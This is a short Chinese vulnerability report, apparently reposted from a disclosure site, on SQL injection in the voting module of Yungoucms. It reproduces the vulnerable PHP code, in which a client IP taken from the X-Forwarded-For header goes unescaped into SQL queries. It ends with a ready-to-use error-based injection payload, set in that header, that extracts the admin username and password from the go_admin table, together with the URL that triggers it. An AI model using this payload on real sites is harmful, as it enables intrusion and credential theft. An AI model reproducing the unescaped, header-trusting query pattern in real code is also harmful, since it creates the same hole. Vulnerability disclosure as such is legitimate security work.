漏洞作者:
详细说明:
根据雨牛的 WooYun: Yungoucms Sql Injection 第一枚
我看了下相同位置的代码
public function checked_option(){
$mysql_model=System::load_sys_class('model');
$title="投票";
$curtime=time();
$option_id=abs(intval($_POST['radio']));
$vote_id= abs(intval($_POST['vote_id']));
$clientip=_get_ip();
$sqlallowguest='';
$sqlinterval=0;
//查询投票项的规则和规定时间
$vote_subjects=$mysql_model->GetOne("select * from `@#_vote_subject` where `vote_id`='$vote_id'");
$sqlallowguest=$vote_subjects['vote_allowguest'];//1允许游客投票 0不允许游客投票
$sqlinterval=$vote_subjects['vote_interval']; //N天后可再次投票,0 表示此IP地址只能投一次
if(1==$sqlallowguest){//判断是否允许游客投票
$vote_activer=$mysql_model->GetOne("select * from `@#_vote_activer` where `vote_id`='$vote_id' and `ip`='$clientip' order by subtime desc");
if(!empty($vote_activer)){//判断该ip用户已经投过票
//上次投票间隔天数
$datenum=($curtime-$vote_activer['subtime'])/(60*60*24);
if($sqlinterval==0 || $datenum<=$sqlinterval){ //0 表示此IP地址只能投一次
_message("您已参加此次投票活动",null,3);
}else{
//查出新增加的票数
$vote_option=$mysql_model->GetList("select * from `@#_vote_option` where `option_id`='$option_id' ");
$option_number=$vote_option[0]['option_number']+1;
$mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' ");
$mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') ");
_message("投票成功,感谢您的参与",null,3);
}
}else{
//查出新增加的票数
$vote_option=$mysql_model->GetList("select * from `@#_vote_option` where `option_id`='$option_id' ");
$option_number=$vote_option[0]['option_number']+1;
$mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' ");
$mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') ");
_message("投票成功,感谢您的参与",null,3);
}
}else{
if($this->userid==''){
_message("您没有投票权限,请登录后投票!",null,3);
exit();
}
$vote_activer=$mysql_model->GetOne("select * from `@#_vote_activer` where `vote_id`='$vote_id' and `userid`='$this->userid'");
if(!empty($vote_activer)){//判断该用户已经投过票
//上次投票间隔天数
$datenum=($curtime-$vote_activer['subtime'])/(60*60*24);
if($sqlinterval==0 || $datenum<=$sqlinterval){ //0 表示此IP地址只能投一次
_message("您已参加此次投票活动",null,3);
}else{
//查出新增加的票数
$vote_option=$mysql_model->GetList("select * from `@#_vote_option` where `option_id`='$option_id' ");
$option_number=$vote_option[0]['option_number']+1;
$mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' ");
$mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') ");
_message("投票成功,感谢您的参与",null,3);
}
}else{
//查出新增加的票数
$vote_option=$mysql_model->GetList("select * from `@#_vote_option` where `option_id`='$option_id' ");
$option_number=$vote_option[0]['option_number']+1;
$mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' ");
$mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') ");
_message("投票成功,感谢您的参与",null,3);
}
}
$clientip=_get_ip()
/*获取客户端ip*/
function _get_ip(){
if (isset($_SERVER['HTTP_CLIENT_IP']) && strcasecmp($_SERVER['HTTP_CLIENT_IP'], "unknown"))
$ip = $_SERVER['HTTP_CLIENT_IP'];
else if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && strcasecmp($_SERVER['HTTP_X_FORWARDED_FOR'], "unknown"))
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
else if (isset($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else if (isset($_SERVER['REMOTE_ADDR']) && isset($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else $ip = "";
return ($ip);
}
把xff改为 1.1.1.1’or updatexml(1,concat(0x5e24,(select concat(username,0x23,userpass) from go_admin limit 0,1),0x5e24),1) or’
登录后打开 http://localhost/yungou/?/vote/vote/checked_option
转载自:oday5